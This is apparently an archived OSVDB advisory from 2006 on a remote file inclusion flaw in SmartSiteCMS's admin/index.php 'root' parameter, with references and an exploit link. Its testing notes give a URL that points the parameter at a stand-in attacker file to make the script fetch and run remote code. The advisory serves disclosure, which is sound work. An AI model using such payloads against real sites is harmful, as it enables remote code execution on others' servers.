SmartSiteCMS admin/index.php root Variable Remote File Inclusion

2006-06-20T11:03:48
ID OSVDB:26750
Type osvdb
Reporter Archit3ct(), IR4DEX GROUP()
Modified 2006-06-20T11:03:48

Description

Vulnerability Description

SmartSiteCMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/index.php not properly sanitizing user input supplied to the 'root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

SmartSiteCMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/index.php not properly sanitizing user input supplied to the 'root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/(path)/admin/index.php?root=http://evilcode.txt?

References:

Vendor URL: http://www.smartsitecms.net/ Secunia Advisory ID:20769 Related OSVDB ID: 26749 Related OSVDB ID: 26751 Related OSVDB ID: 26752 Related OSVDB ID: 26748 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0588.html Generic Exploit URL: http://milw0rm.com/exploits/1936 CVE-2006-3421 Bugtraq ID: 18697